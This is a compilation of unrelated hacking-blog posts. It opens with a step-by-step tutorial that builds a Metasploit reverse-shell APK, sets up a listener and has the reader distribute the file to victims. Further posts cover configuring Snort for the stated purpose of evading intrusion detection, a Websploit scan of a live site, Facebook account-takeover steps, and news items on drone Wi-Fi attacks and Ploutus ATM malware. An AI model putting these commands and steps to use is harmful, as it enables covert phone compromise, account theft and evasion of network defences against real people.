Hacking Android Smartphone Tutorial ( Easy Way )

Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast.
What is android? according to wikipedia:

Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
and what is APK? according to wikipedia:

Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.
Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443

Requirements:

1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)

2. Android smartphone (we use HTC One android 4.4 KitKat)

Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this tutorial.

msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>

As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command



3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.



Info:

use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2

4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.



Info:

set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection

5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution ).

6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:



7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.

Evade A Network Intrusion Detection System (NIDS) Using Snort.

Welcome back, my fledgling hackers!

Nearly every commercial enterprise worth hacking has an intrusion detection system (IDS). These network intrusion detection systems are designed to detect any malicious activity on the network. That means you!
As the name implies, a network intrusion detection system (NIDS) is intended to alert the system administrator of network-based intrusions. As a hacker, the better we understand how these NIDS work, the better we can evade them and stealthily enter and exit a network without detection. In an attempt to train you to evade these systems, I am beginning new series on how NIDS work.

Introducing Snort: Our NIDS of Choice

Snort is an open-source NIDS that is the most widely used NIDS in the world. Some estimate its market share at over 60%. It's used by such large organizations as Verizon, AT&T, the U.S. State Department, most U.S. military bases, and millions of medium to large businesses around the globe. Last month (July 2013), Cisco announced that they would be acquiring the parent company of Snort, Sourcefire Inc. of Columbia, MD. This insures that Snort will remain the dominant NIDS on the planet for some time to come, making it increasingly important that we understand Snort—so we can evade it.

Fortunately, Snort is built into our BackTrack, so we don't need to install it. If you do need to download it, you can find it here.

Step 1: Fire Up Snort

Snort is basically a network traffic sniffer that can apply rules to the traffic it sees to determine whether it contains malicious traffic. We can start Snort in sniffer mode by opening any terminal in BackTrack and typing:

• snort -vde

After we hit enter, we begin to see packets going past the screen in rapid succession. Snort is simply sniffing packets from the wire and displaying them to us.

To stop Snort, hit the Control C. When we stop Snort, it displays our statistics on the packet capture.

Step 2: Intrusion Detection Mode

To get Snort to operate in Intrusion Detection (IDS) mode, we need to get Snort to use its configuration file. Nearly all applications in Linux are controlled by a configuration file that is a simple text file. This same applies to Snort. Snort's configuration file is named snort.conf and is usually found at /etc/snort/snort.conf. So, to get Snort to use its configuration file, we need to start it with:

• snort -vde -c /etc/snort/snort.conf

Where -c says use the configuration file, and /etc/snort/snort.conf is the location of the configuration file.
When Snort starts in IDS mode, we begin to see a screen similar to that below. Eventually, the screen will stop scrolling and Snort will begin to watch your network traffic.

Now Snort is sniffing our wire and will alert when something malicious appears!

Step 3: Configuring Snort

Snort comes with a default configuration file that, for the most part, will work with little editing. The configuration has plenty of comments to explain what each line and section does, so you can figure it out with little outside assistance.
Their are at least 3 areas, though, that need some attention and configuring...

1. The EXTERNAL_NET variable
2. The HOME_NET variable
3. The path to the Snort rules

Without the Snort rules, Snort is just a sniffer/packet logger, far from the powerful IDS it can be. That being said, let's get inside that Snort configuration file and make the minimum changes to get Snort to run as an effective IDS.
Let's open the snort configuration file with KWrite.

• kwrite /etc/snort/snort.conf

As you can see in the screenshot above, the configuration file is comprised of six (6) sections.

1. Set the variables on your network
2. Configure dynamic loaded libraries
3. Configure preprocessors
4. Configure output plugins
5. Add any runtime config directives
6. Customize your rule set

We need to first set the variables for our internal and external network. These are defined by the lines:

• var HOME_NET
• var EXTERNAL_NET

We can define our HOME_NET as the IP address or subnet we're trying to protect. You see in the screenshot that it's set as "any." This will work, but it's not optimal for detecting malicious activity. We should set the HOME_NET to our internal IP address, such as 192.168.1.1, or our internal subnet, such as 192.168.1.0/24.
In most cases, security admins will define their EXTERNAL_NET as everything that is NOT their HOME_NET. To accomplish this, we can simply negate (!) the HOME_NET or ! HOME_NET.

Next, we need to set our path to our rules. As we can see in the screenshot below, about two-thirds of the way down, there is:

• var RULE_PATH /etc/snort/rules

In most installations, this path will be correct (but does vary with different installations) and we can simply leave it as is, but make certain that your rules are in this path before assuming so. When you are done, simply save the snort.conf file.

Step 4: Checking the Snort Rules

We can navigate to the rules directory by typing these two commands:

• cd /etc/snort/rules
• ls -l

In this way, we can see all of the files that comprise our Snort rules. It's these Snort rules that are designed to catch intrusions and alert the security admin.

In my next tutorial in this series, we will examine these rules and how they work to catch intrusions. The better we understand these Snort rules, the better we able to evade them!

WEBSPLOIT TUTORIAL MITM ATTACK ::: KALI LINUX

Websploit is an automatic vulnerability assessment, web crawler and exploiter tool. It is an open source command line utility that composed on modular structure. At the time of writing, there are 16 modules are available on Websploit, it can be downloaded from sourceforge project website but it is available on Kali Linux by default.

Websploit can be synchronize with Metasploit WMAP project for web vulnerability scanning, there are four categories of modular are available and they are:

• Web Modules
• Network Modules
• Exploit Modules
• Wireless Modules

In Wireless module we can run some interesting WiFi attacking vector including the WiFi jammer and WiFi DDOS attack. For exploitation, websploit is working on the basis of Metasploit Autopwn service and metasploit browser autopwn service. A large number of interesting attacking vectors are available on the network modules, and they are but not limited to:

• ARP cache DOS attack
• Middle Finger Of Doom Attack
• Man In The Middle Attack
• Man Left In The Middle Attack
• Fake Update Attack Using DNS Spoof
• And more....

Some modules of websploit are depends on Metasploit for example

• Information Gathering From Victim Web Using (Metasploit Wmap)

So it is recommended to configure Metasploit before using these modules, the demonstration of every modules are not possible on this single article, but the basic command and usage of the software mentioned below and it surely help you to use websploit in a professional manner.

If you are on Kali Linux, then click on Applications → Kali Linux → Web Applications → Web Vulnerability Scanners → Websploit

The list of commands that can applicable on websploit are:

Commands                   Description

---------------                  ----------------

set                              Set Value Of Options To Modules

scan                            Scan Wifi (Wireless Modules)

stop                            Stop Attack & Scan (Wireless Modules)

run                             Execute Module

use                             Select Module For Use

os                               Run Linux Commands(ex : os ifconfig)

back                           Exit Current Module

show modules            Show Modules of Current Database

show options              Show Current Options Of Selected Module

upgrade                     Get New Version

update                        Update Websploit Framework

In the demonstration mentioned below: the web directory scanner attack will be performed.

wsf > show modules

..

..

wsf > use web/dir_scanner

wsf:Dir_Scanner > show options

Options Value

--------- --------------

TARGET http://google.com

wsf:Dir_Scanner > set TARGET http://ehacking.net

TARGET => ehacking.net

wsf:Dir_Scanner > run

[*] Your Target : ehacking.net

[*]Loading Path List ... Please Wait ...

[index] ... [404 Not Found]

[images] ... [404 Not Found]

[download] ... [404 Not Found]

..

..

..

The commands to perform other attacking vector are same, just follow the steps mentioned above.

Truecrypt Encryption Tool Clears The First Phase Of Security Audit .

Is TrueCrypt Audited Yet? Yes, In Part! One of the world's most-used open source file encryption software trusted by tens of millions of users - TrueCrypt is being audited by a team of experts to assess if it could be easily exploited and cracked. Hopefully it has cleared the first phase of the audit and given a relatively clean bill of health.

TrueCrypt is a free, open-source and cross-platform encryption program available for Windows, OSX and Linux that can be used to encrypt individual folders or encrypt entire hard drive partitions including the system partition. 

The program is also capable to do some amazing things, such as can create a hidden operating system on a computer, essentially an OS within an OS where users can keep their most secret files.

EVERYONE HAS SOMETHING TO HIDE
TrueCrypt developers are anonymous and used the aliases “ennead” and “syncon”, perhaps to avoid unwelcome attention from their own governments. But when we talk about Privacy and Security, we can't trust anyone, especially when someone like NSA is out there.

This is a major reason that security community has took an initiative to perform a public Security Audit of TrueCrypt in response to the concerns that National Security Agency (NSA) may have tampered with it.

iSec Research Lab was contracted to carry out  public cryptanalysis and security audit of TrueCrypt by the cryptography community, Open Crypto Audit Project (OCAP) and they has ‪found “no evidence of backdoors or otherwise intentionally malicious code in the assessed areas.”

11 VULNERABILITIES FOUND, BUT NOT CRITICAL
Auditors review more than 70,000 lines of TrueCrypt source code and architecture. Finally yesterday they have turned up 11 vulnerabilities in the full disk and file encryption software's source code, but no "high-severity" issues, which means nothing particularly found inappropriate and certainly nothing looks like a backdoor or intentional flaws.

According to the researchers, none of the vulnerabilities seems as an intentional flaw or immediate exploitation vectors, rather all of the identified findings appeared to be accidental.

“Overall, iSEC does think changes can be made to improve code quality and maintainability, and that the build process should be updated to rely on recent tools with trustworthy provenance. In sum, while TrueCrypt does not have the most polished programming style, there is nothing immediately dangerous to report,” reads the audit report [PDF released on April 14].

These results are from the first phase of the audit, focused on the TrueCrypt bootloader and Windows kernel driver; architecture and code review.

PHASE 2 - CRYPTOGRAPHIC TESTS
Now, TrueCrypt is about to get a second phase exam that may hopefully give the software a clean bill of health too, because the project to audit TrueCrypt has raised tens of thousands of dollars to peer into TrueCrypt's deepest recesses. Second Phase test will include a thorough analysis of the various encryption cipher suites and  implementation of random number generators and critical key algorithms.

Hacking Facebook Account With Just A Text Message .

Can you ever imagine that a single text message is enough to hack any Facebook account without user interaction or without using any other malicious stuff like Trojans, phishing, keylogger etc. ?

Today we are going to explain you that how a UK based Security Researcher, "fin1te" is able to hack any Facebook account within a minute by doing one SMS.

Because 90% of us are Facebook user too, so we know that there is an option of linking your mobile number with your account, which allows you to receive Facebook account updates via SMS directly to your mobile and also you can login into your account using that linked number rather than your email address or username.

According to hacker, the loophole was in phone number linking process, or in technical terms, at file /ajax/settings/mobile/confirm_phone.php

This particular webpage works in background when user submit his phone number and verification code, sent by Facebook to mobile. That submission form having two main parameters, one for verification code, and second is profile_id, which is the account to link the number to.

As attacker, follow these steps to execute hack: 

1. Change value of profile_id to the Victim's profile_id value by tampering the parameters.
2. Send the letter F to 32665, which is Facebook’s SMS shortcode in the UK. You will receive an 8 character verification code back.
3. 
4. Enter that code in the box or as confirmation_code parameter value and Submit the form.

Facebook will accept that confirmation code and attacker's mobile number will be linked to victim's Facebook profile.

In next step hacker just need to go to Forgot password option and initiate the password reset request against of victim's account.

Attacker now can get password recovery code to his own mobile number which is linked to victim's account using above steps. Enter the code and Reset the password!

Facebook no longer accepting the profile_id parameter from the user end after receiving the bug report from the hacker.

In return, Facebook paying $20,000 to fin1te as Bug Bounty.

Snoopy Drones Can Hack Your Smartphones .

The use of unmanned aerial vehicles (UAVS) called Drones is rapidly transforming the way we go to war. Drones were once used for land surveillance, Delivering Pizza's, then equipped with bombs that changed the way nations conduct war and now these hovering drones are ready to hack your Smartphones.

London-based Sensepoint security researchers have developed a drone called 'Snoopy' that can intercept data from your Smartphones using spoofed wireless networks, CNN Money reported.

The Drone will search for WiFi enabled devices and then using its built-in technology, it will see what networks the phones have accessed in the past and pretends to be one of those old network connections.

Spoofing WiFi networks that device has already accessed allows Snoopy Drone to connect with targeted Smartphone without authentication or interaction. In technical terms, The Drone will use 'Wireless Evil Twin Attack' to hack Smartphones.

Once connected, Snoopy Drone can access your WiFi enabled Smartphones, allowing the attacker to remotely capture login credentials, personal data, and more.

Snoopy is self-powered and extremely mobile and researchers have successfully stolen Amazon, PayPal, and Yahoo credentials while testing it out in the skies of London.


The collection of metadata, including Wireless Network Names and Device IDs is not illegal, but intercepting personal data would likely violate wiretapping and identity theft laws.

If the technology got in the hands of criminals, there are all kinds of things they could do. Researchers said they have no malicious intent in developing Snoopy Drone, they are demonstrating the technology to highlight how vulnerable Smartphone users can be.

WiFi hacking is very simple to execute and are becoming far more common these days. If you are concerned about such attacks, just turn off that automatic WiFi network-finding feature.

Hack ATM Machines With Just An SMS .

As we reported earlier, Microsoft will stop supporting the Windows XP operating system after 8th April, apparently 95% of the world’s 3 million ATM machines are run on it. Microsoft's decision to withdraw support for Windows XP poses critical security threat to the economic infrastructure worldwide.

MORE REASONS TO UPGRADE

Security researchers at Antivirus firm Symantec claimed that hackers can exploit a weakness in Windows XP based ATMs, that allow them to withdraw cash simply by sending an SMS to compromised ATMs.

"What was interesting about this variant of Ploutus was that it allowed cybercriminals to simply send an SMS to the compromised ATM, then walk up and collect the dispensed cash. It may seem incredible, but this technique is being used in a number of places across the world at this time." researchers said.

HARDWIRED Malware for ATMs

According to researchers - In 2013, they detected a malware named Backdoor.Ploutus, installed on ATMs in Mexico, which is designed to rob a certain type of standalone ATM with just the text messages.

To install the malware into ATMs machines, hacker must connect the ATM to a mobile phone via USB tethering and then to initiate a shared Internet connection, which then can be used to send specific SMS commands to the phone attached or hardwired inside the ATM.

"Since the phone is connected to the ATM through the USB port, the phone also draws power from the connection, which charges the phone battery. As a result, the phone will remain powered up indefinitely."

HOW-TO HACK ATMs

• Connect a mobile phone to the machine with a USB cable and install Ploutus Malware.
• The attacker sends two SMS messages to the mobile phone inside the ATM.
• SMS 1 contains a valid activation ID to activate the malware
• SMS 2 contains a valid dispense command to get the money out
• Mobile attached inside the ATM detects valid incoming SMS messages and forwards them to the ATM as a TCP or UDP packet.
• Network packet monitor (NPM) module coded in the malware receives the TCP/UDP packet and if it contains a valid command, it will execute Ploutus
• Amount for Cash withdrawal is pre-configured inside the malware
• Finally, the hacker can collect cash from the hacked ATM machine.

Researchers have detected few more advanced variants of this malware, some attempts to steal customer card and PIN data, while others attempt man-in-the-middle attacks.

This malware is now spreading to other countries, so you are recommended to pay extra attention and remain cautious while using an ATM.